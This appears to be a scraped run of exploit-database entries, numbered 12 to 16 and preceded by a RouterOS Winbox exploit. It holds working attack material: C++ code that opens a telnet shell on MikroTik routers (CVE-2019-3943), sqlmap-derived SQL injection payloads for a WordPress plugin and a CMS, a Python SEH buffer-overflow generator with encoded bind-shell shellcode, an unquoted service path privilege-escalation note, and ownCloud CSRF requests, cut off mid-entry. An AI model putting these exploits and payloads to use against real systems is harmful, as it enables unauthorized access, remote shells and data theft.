## Usage Example # ```sh # albinolobster@ubuntu:~/routeros/poc/winbox_dns_request/build$ ./winbox_dns_request -i 192.168.1.50 -p 8291 -s 8.8.8.8 # -> {bff0005:1,u1:134744072,uff0006:1,uff0007:3,s3:'example.com',Uff0001:[14]} # <- {u4:584628317,uff0003:2,uff0006:1,s3:'example.com',U6:[584628317],U7:[21496],Uff0001:[],Uff0002:[14],S5:['example.com']} # albinolobster@ubuntu:~/routeros/poc/winbox_dns_request/build$ ssh [email protected] # ... # [admin@MikroTik] > ip dns cache print # Flags: S - static # # NAME ADDRESS TTL # 0 example.com 93.184.216.34 5h57m57s # [admin@MikroTik] > # ``` # Source: # https://github.com/tenable/routeros/tree/master/poc/winbox_dns_request /* Copyright 2019 Tenable, Inc. * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include <fstream> #include <cstdlib> #include <iostream> #include <boost/cstdint.hpp> #include <boost/program_options.hpp> #include <boost/algorithm/string.hpp> #include "winbox_session.hpp" #include "winbox_message.hpp" namespace { const char s_version[] = "CVE-2019-3943 PoC Using SNMP dlopen"; bool parseCommandLine(int p_argCount, const char* p_argArray[], std::string& p_username, std::string& p_password, std::string& p_ip, std::string& p_port) { boost::program_options::options_description description("options"); description.add_options() ("help,h", "A list of command line options") ("version,v", "Display version information") ("username,u", boost::program_options::value<std::string>(), "The user to log in as") ("password", boost::program_options::value<std::string>(), "The password to log in with") ("port,p", boost::program_options::value<std::string>()->default_value("8291"), "The Winbox port to connect to") ("ip,i", boost::program_options::value<std::string>(), "The IPv4 address to connect to"); boost::program_options::variables_map argv_map; try { boost::program_options::store( boost::program_options::parse_command_line( p_argCount, p_argArray, description), argv_map); } catch (const std::exception& e) { std::cerr << e.what() << "\n" << std::endl; std::cerr << description << std::endl; return false; } boost::program_options::notify(argv_map); if (argv_map.empty() || argv_map.count("help")) { std::cerr << description << std::endl; return false; } if 
(argv_map.count("version")) { std::cerr << "Version: " << ::s_version << std::endl; return false; } if (argv_map.count("username") && argv_map.count("ip") & argv_map.count("port")) { p_username.assign(argv_map["username"].as<std::string>()); p_ip.assign(argv_map["ip"].as<std::string>()); p_port.assign(argv_map["port"].as<std::string>()); if (argv_map.count("password")) { p_password.assign(argv_map["password"].as<std::string>()); } else { p_password.assign(""); } return true; } else { std::cerr << description << std::endl; } return false; } } int main(int p_argc, const char** p_argv) { std::string username; std::string password; std::string ip; std::string port; if (!parseCommandLine(p_argc, p_argv, username, password, ip, port)) { return EXIT_FAILURE; } Winbox_Session winboxSession(ip, port); if (!winboxSession.connect()) { std::cerr << "Failed to connect to the remote host" << std::endl; return EXIT_FAILURE; } boost::uint32_t p_session_id = 0; if (!winboxSession.login(username, password, p_session_id)) { std::cerr << "[-] Login failed." << std::endl; return false; } WinboxMessage msg; msg.set_to(0x4c); msg.set_command(0xa0065); msg.set_request_id(1); msg.set_reply_expected(true); msg.add_u32(5,80); // height msg.add_u32(6,24); // width msg.add_u32(8,1); // controls method. 0 (nova/bin/login), 1 (telnet), 2 (ssh), 3 (mactel), 4 (nova/bin/telser), default... msg.add_string(0x0a, username); //username msg.add_string(1,""); msg.add_string(7, "vt102"); msg.add_string(9, "-l a"); // drop into telnet client shell winboxSession.send(msg); msg.reset(); if (!winboxSession.receive(msg)) { std::cerr << "Error receiving a response." 
<< std::endl; return EXIT_FAILURE; } if (msg.has_error()) { std::cout << "error: " << msg.get_error_string() << std::endl; } boost::uint32_t session_id = msg.get_u32(0xfe0001); msg.reset(); msg.set_to(0x4c); msg.set_command(0xa0068); msg.set_request_id(2); msg.set_reply_expected(true); msg.add_u32(5,82); msg.add_u32(6,24); msg.add_u32(0xfe0001, session_id); winboxSession.send(msg); boost::uint32_t tracker = 0; msg.reset(); if (!winboxSession.receive(msg)) { std::cerr << "Error receiving a response." << std::endl; return EXIT_FAILURE; } msg.reset(); msg.set_to(0x4c); msg.set_command(0xa0067); msg.set_request_id(3); msg.set_reply_expected(true); msg.add_u32(3, tracker); msg.add_u32(0xfe0001, session_id); winboxSession.send(msg); msg.reset(); if (!winboxSession.receive(msg)) { std::cerr << "Error receiving a response." << std::endl; return EXIT_FAILURE; } if (msg.has_error()) { std::cout << msg.serialize_to_json() << std::endl; std::cout << "error: " << msg.get_error_string() << std::endl; return EXIT_FAILURE; } else if (!msg.get_raw(0x02).empty()) { std::string raw_payload(msg.get_raw(0x02)); tracker += raw_payload.size(); } //{u3:1047,ufe0001:0,uff0007:655463,r2:[115],Uff0001:[76],Uff0002:[0,456]} msg.reset(); msg.set_to(0x4c); msg.set_command(0xa0067); msg.set_request_id(4); msg.set_reply_expected(true); msg.add_u32(3, tracker); msg.add_u32(0xfe0001, session_id); msg.add_raw(2, "set tracefile /pckg/option\n"); winboxSession.send(msg); bool found_telnet_prompt = false; while (!found_telnet_prompt) { msg.reset(); if (!winboxSession.receive(msg)) { std::cerr << "Error receiving a response." << std::endl; return EXIT_FAILURE; } if (msg.has_error()) { std::cout << msg.serialize_to_json() << std::endl; std::cout << "error: " << msg.get_error_string() << std::endl; return EXIT_FAILURE; } else if (!msg.get_raw(0x02).empty()) { std::string raw_payload(msg.get_raw(0x02)); if (raw_payload.find("telnet> ") != std::string::npos) { std::cout << "Success!" 
<< std::endl; found_telnet_prompt = true; } } } return EXIT_SUCCESS; }
  12. # Exploit Title: Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection # Google Dork: inurl:"/wp-content/plugins/wp-google-places-review-slider/" # Date: 2019-07-02 # Exploit Author: Princy Edward # Exploit Author Blog : https://prinyedward.blogspot.com/ # Vendor Homepage: https://wordpress.org/plugins/wp-google-places-review-slider/ # Version: 6.1 # Tested on: Apache/2.2.24 (CentOS) # CVE : #POC : GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=*** &taction=edit HTTP/1.1 #SQLMAP Result : sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests: --- Parameter: tid (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM (SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit # Changeset: # Issue fixed in version 6.2 # https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2180197%40wp-google-places-review-slider&old=2163061%40wp-google-places-review-slider&sfp_email=&sfph_mail= Cheers! PrincyEdward
  13. # Exploit Title: WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH) # Google Dork: N/A # Date: 2019-10-30 # Exploit Author: Doan Nguyen (4ll4u) # Vendor Homepage:https://www.alloksoft.com/ # Software Link: https://www.alloksoft.com/wmv.htm # Version: v4.6.1217 # Tested on: Windows XP SP3 # CVE : N/A # Reference from : [1] https://www.exploit-db.com/exploits/47563 # 1.- Run python code :poc.py # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open WMV to AVI MPEG DVD WMV Convertor and Click 'EnterKey' # 4.- Paste the content of EVIL.txt into the Field: 'License Name and License Code' # 5.- Click 'OK' and you will get a bind shell on port 4444 #msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -b '\x00' -f hex #We need to create meaningful characters when pasting into the password on the application (allow characters include:\x21->\x7E in ASCII TABLE) shellcode = ( "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x53\x2A\x52\x25\x2D\x53\x2A\x52\x25\x2D\x55\x2A\x52\x25\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x23\x34\x4D\x68\x2D\x23\x34\x4D\x68\x2D\x24\x36\x4D\x69\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x5C\x30\x75\x2D\x62\x5C\x30\x75\x2D\x62\x5E\x31\x75\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x60\x73\x71\x3B\x2D\x60\x73\x71\x3B\x2D\x61\x75\x73\x3D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4B\x39\x6F\x40\x2D\x4B\x39\x6F\x40\x2D\x4C\x39\x70\x40\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x47\x44\x27\x2D\x62\x47\x44\x27\x2D\x63\x47\x45\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x38\x49\x2A\x35\x2D\x38\x49\x2A\x35\x2D\x38\x49\x2A\x36\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5D\x71\x68\x26\x2D\x5D\x71\x68\x26\x2D\x5D\x71\x6A\x28\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x47\x21\x25\x28\x2D\x47\x21\x25\x28\x2D\x49\x22\x27\x29\x50" 
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x44\x56\x34\x3C\x2D\x44\x56\x34\x3C\x2D\x45\x58\x35\x3C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x57\x31\x33\x44\x2D\x57\x31\x33\x44\x2D\x58\x32\x34\x45\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3C\x6E\x4F\x50\x2D\x3C\x6E\x4F\x50\x2D\x3E\x70\x50\x52\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3F\x38\x33\x5F\x2D\x3F\x38\x33\x5F\x2D\x40\x39\x33\x60\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6F\x4D\x38\x22\x2D\x6F\x4D\x38\x22\x2D\x6F\x4F\x3A\x24\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x72\x56\x55\x2D\x62\x72\x56\x55\x2D\x63\x74\x58\x55\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4B\x66\x52\x53\x2D\x4B\x66\x52\x53\x2D\x4C\x67\x52\x54\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3B\x22\x35\x71\x2D\x3B\x22\x35\x71\x2D\x3C\x22\x37\x72\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2E\x4F\x64\x55\x2D\x2E\x4F\x64\x55\x2D\x2E\x51\x65\x55\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x59\x48\x59\x5A\x2D\x59\x48\x59\x5A\x2D\x5B\x4A\x59\x5B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x62\x5C\x5A\x2D\x49\x62\x5C\x5A\x2D\x4A\x64\x5C\x5C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x63\x54\x2A\x47\x2D\x63\x54\x2A\x47\x2D\x65\x55\x2A\x47\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x48\x4D\x4D\x43\x2D\x48\x4D\x4D\x43\x2D\x49\x4F\x4E\x45\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x30\x75\x60\x3A\x2D\x30\x75\x60\x3A\x2D\x32\x75\x60\x3A\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x60\x6B\x3F\x52\x2D\x60\x6B\x3F\x52\x2D\x60\x6D\x40\x54\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3F\x47\x21\x58\x2D\x3F\x47\x21\x58\x2D\x3F\x49\x22\x58\x50" 
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x65\x4E\x25\x4A\x2D\x65\x4E\x25\x4A\x2D\x65\x4E\x27\x4C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3E\x35\x60\x46\x2D\x3E\x35\x60\x46\x2D\x3E\x37\x60\x46\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x45\x2E\x2D\x41\x2D\x45\x2E\x2D\x41\x2D\x45\x30\x2E\x42\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6C\x4B\x74\x4C\x2D\x6C\x4B\x74\x4C\x2D\x6E\x4C\x74\x4C\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x42\x43\x29\x26\x2D\x42\x43\x29\x26\x2D\x43\x43\x2A\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2F\x61\x43\x34\x2D\x2F\x61\x43\x34\x2D\x31\x61\x45\x34\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x50\x58\x4B\x69\x2D\x50\x58\x4B\x69\x2D\x52\x59\x4D\x6A\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x71\x29\x29\x39\x2D\x71\x29\x29\x39\x2D\x73\x2B\x2A\x39\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x54\x68\x52\x6D\x2D\x54\x68\x52\x6D\x2D\x55\x68\x52\x6D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x20\x3C\x5B\x64\x2D\x20\x3C\x5B\x64\x2D\x21\x3E\x5B\x66\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x58\x6E\x65\x6B\x2D\x58\x6E\x65\x6B\x2D\x5A\x6F\x67\x6B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x69\x26\x52\x23\x2D\x69\x26\x52\x23\x2D\x69\x27\x54\x25\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x46\x3F\x27\x71\x2D\x46\x3F\x27\x71\x2D\x48\x40\x29\x72\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3C\x24\x52\x54\x2D\x3C\x24\x52\x54\x2D\x3E\x26\x54\x54\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5C\x40\x4F\x55\x2D\x5C\x40\x4F\x55\x2D\x5D\x40\x51\x57\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6A\x5C\x33\x58\x2D\x6A\x5C\x33\x58\x2D\x6A\x5C\x34\x59\x50" 
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5F\x3E\x5A\x5D\x2D\x5F\x3E\x5A\x5D\x2D\x5F\x40\x5C\x5E\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x4D\x6A\x3B\x2D\x49\x4D\x6A\x3B\x2D\x4A\x4F\x6C\x3C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x23\x6B\x3D\x2D\x62\x23\x6B\x3D\x2D\x63\x23\x6B\x3F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x23\x6A\x57\x67\x2D\x23\x6A\x57\x67\x2D\x24\x6C\x57\x67\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x23\x43\x60\x50\x2D\x23\x43\x60\x50\x2D\x25\x43\x60\x50\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x73\x31\x34\x2A\x2D\x73\x31\x34\x2A\x2D\x73\x33\x34\x2B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x38\x56\x63\x59\x2D\x38\x56\x63\x59\x2D\x39\x56\x65\x59\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x40\x52\x60\x66\x2D\x40\x52\x60\x66\x2D\x41\x53\x61\x67\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x24\x61\x73\x2A\x2D\x24\x61\x73\x2A\x2D\x26\x61\x75\x2A\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x48\x34\x53\x66\x2D\x48\x34\x53\x66\x2D\x48\x34\x54\x68\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3C\x26\x57\x26\x2D\x3C\x26\x57\x26\x2D\x3C\x27\x58\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x54\x63\x3A\x27\x2D\x54\x63\x3A\x27\x2D\x54\x63\x3A\x27\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x26\x26\x2F\x50\x2D\x26\x26\x2F\x50\x2D\x27\x27\x2F\x51\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x30\x52\x2E\x62\x2D\x30\x52\x2E\x62\x2D\x30\x54\x30\x63\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x31\x5A\x75\x73\x2D\x31\x5A\x75\x73\x2D\x32\x5B\x75\x75\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x36\x41\x66\x56\x2D\x36\x41\x66\x56\x2D\x36\x42\x68\x57\x50" 
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x36\x63\x50\x32\x2D\x36\x63\x50\x32\x2D\x36\x63\x51\x33\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x59\x4B\x23\x26\x2D\x59\x4B\x23\x26\x2D\x5A\x4C\x24\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x28\x68\x4A\x4D\x2D\x28\x68\x4A\x4D\x2D\x2A\x69\x4B\x4F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2E\x41\x53\x6A\x2D\x2E\x41\x53\x6A\x2D\x30\x42\x55\x6A\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6F\x6A\x2F\x6D\x2D\x6F\x6A\x2F\x6D\x2D\x6F\x6A\x2F\x6E\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2C\x44\x30\x30\x2D\x2C\x44\x30\x30\x2D\x2D\x46\x30\x31\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4A\x67\x69\x4F\x2D\x4A\x67\x69\x4F\x2D\x4A\x69\x69\x51\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x65\x44\x45\x68\x2D\x65\x44\x45\x68\x2D\x66\x44\x45\x6A\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6F\x57\x32\x45\x2D\x6F\x57\x32\x45\x2D\x6F\x59\x34\x47\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x35\x2C\x45\x43\x2D\x35\x2C\x45\x43\x2D\x37\x2C\x46\x45\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x69\x4A\x5A\x6D\x2D\x69\x4A\x5A\x6D\x2D\x6A\x4A\x5C\x6F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2F\x54\x6B\x5E\x2D\x2F\x54\x6B\x5E\x2D\x2F\x56\x6B\x60\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x40\x25\x6E\x55\x2D\x40\x25\x6E\x55\x2D\x41\x26\x6E\x57\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x52\x6F\x33\x2D\x2D\x52\x6F\x33\x2D\x2D\x52\x70\x33\x2F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3A\x6E\x6D\x3D\x2D\x3A\x6E\x6D\x3D\x2D\x3B\x6E\x6E\x3E\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4E\x3D\x41\x4F\x2D\x4E\x3D\x41\x4F\x2D\x4F\x3D\x42\x4F\x50" 
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x28\x48\x64\x2D\x49\x28\x48\x64\x2D\x4A\x28\x49\x64\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x73\x2E\x5A\x59\x2D\x73\x2E\x5A\x59\x2D\x74\x2E\x5A\x59\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4E\x68\x29\x3A\x2D\x4E\x68\x29\x3A\x2D\x4F\x68\x2B\x3B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x21\x32\x38\x36\x2D\x21\x32\x38\x36\x2D\x22\x32\x38\x36\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x53\x4C\x2B\x47\x2D\x53\x4C\x2B\x47\x2D\x54\x4C\x2B\x47\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5C\x2F\x47\x6B\x2D\x5C\x2F\x47\x6B\x2D\x5E\x31\x47\x6B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6D\x35\x37\x5C\x2D\x6D\x35\x37\x5C\x2D\x6D\x35\x39\x5D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x28\x35\x41\x22\x2D\x28\x35\x41\x22\x2D\x28\x36\x43\x22\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2D\x40\x6F\x2B\x2D\x2D\x40\x6F\x2B\x2D\x2F\x41\x6F\x2C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x20\x42\x3C\x2B\x2D\x20\x42\x3C\x2B\x2D\x21\x43\x3E\x2D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3F\x4E\x54\x2B\x2D\x3F\x4E\x54\x2B\x2D\x3F\x50\x54\x2B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x29\x69\x53\x44\x2D\x29\x69\x53\x44\x2D\x2B\x6A\x54\x46\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x6B\x6F\x39\x2D\x62\x6B\x6F\x39\x2D\x62\x6C\x6F\x39\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x67\x6C\x40\x26\x2D\x67\x6C\x40\x26\x2D\x69\x6E\x41\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x59\x36\x44\x2D\x49\x59\x36\x44\x2D\x4A\x59\x37\x46\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x61\x68\x61\x2E\x2D\x61\x68\x61\x2E\x2D\x61\x68\x63\x2E\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x70\x6f\x6f\x6f\x50\x50\x50" # push 12 NOP ) alignment = "\x54\x58\x2d\x54\x54\x54\x54\x2d\x37\x63\x54\x54\x2d\x25\x31\x57\x57\x50\x5C" # stack alignment 001292C0 - 0012AA10 jump_short = "\x90\x90\xEB\x08" # jump to 00129A44 pop_pop_ret ="\x09\x9a\x01\x10" # pop pop ret in 
SkinMagic.dll buffer = "\x41" * 780 + jump_short + pop_pop_ret + "\x41\x41\x41\x41" + alignment + shellcode + (6000 - 780 - 4 - 4 - len(shellcode) - len(alignment)) * "\x45" try: f=open("shell.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"
  14. # Exploit Title: TheJshen contentManagementSystem 1.04 - 'id' SQL Injection # Date: 2019-11-01 # Exploit Author: Cakes # Vendor Homepage: https://github.com/thejshen/contentManagementSystem # Version: 1.04 # Software Link: https://github.com/thejshen/contentManagementSystem.git # Tested on: CentOS7 # GET parameter 'id' easy SQL Injection --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=4' AND 5143=5143-- OWXt Vector: AND [INFERENCE] Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=4' AND (SELECT 4841 FROM (SELECT(SLEEP(5)))eqmp)-- ZwTG Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: id=-4903' UNION ALL SELECT NULL,NULL,CONCAT(0x716a706b71,0x66766f636c546750775053685352676c4f70724d714c4b64494e755252765a626370615a565a4b49,0x717a6a7671),NULL,NULL-- hkoh Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT]
  15. # Title: OpenVPN Private Tunnel 2.8.4 - 'ovpnagent' Unquoted Service Path # Author: Sainadh Jamalpur # Date: 2019-10-31 # Vendor Homepage: https://openvpn.net/ # Software Link: https://swupdate.openvpn.org/privatetunnel/client/privatetunnel-win-2.8.exe # Version : PrivateTunnel v2.8.4 # Tested on: Windows 10 64bit(EN) # CVE : N/A # ===================================================== # 1. Description: # The 'ovpnagent' service in OpenVPN Private Tunnel v2.8.4 has an unquoted service path. #PoC =========== C:\>sc qc ovpnagent [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ovpnagent TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\OpenVPN Technologies\PrivateTunnel\ovpnagent.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OpenVPN Agent DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\> #Exploit: ============ A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications, where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the service, which runs as LocalSystem (see SERVICE_START_NAME above).
  16. # Exploit Title: ownCloud 10.3.0 stable - Cross-Site Request Forgery # Date: 2019-10-31 # Exploit Author: Ozer Goker # Vendor Homepage: https://owncloud.org # Software Link: https://owncloud.org/download/ # Version: 10.3 # CVE: N/A # Introduction # Your personal cloud collaboration platform With over 50 million users # worldwide, ownCloud is the market-leading open source software for # cloud-based collaboration platforms. As an alternative to Dropbox, OneDrive # and Google Drive, ownCloud offers real data security and privacy for you # and your data. ################################################################################################################################## # CSRF1 # Create Folder MKCOL /remote.php/dav/files/user/test HTTP/1.1 Host: 192.168.2.111 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest requesttoken: VREONXtUByUsCkMAcRscHjUGHjYGPBoHJQgsfzoHWEk=:fUCe0mdAzn0T3MNKlKqYMEBFcezMTukbmbVeDs+jKlo= Origin: http://192.168.2.111 DNT: 1 Connection: close Cookie: oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k ################################################################################################################################## # CSRF2 # Delete Folder DELETE /remote.php/dav/files/user/test HTTP/1.1 Host: 192.168.2.111 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest requesttoken: HDQcAi5jLSkkKysEGiYxZSA7PhcaCWEYFydhQ106YEM=:/pQReZNMrOXPXpc0yvQxQp9YQJ7q3HShA9D2+R2EJuI= Origin: http://192.168.2.111 DNT: 1 Connection: close Cookie: 
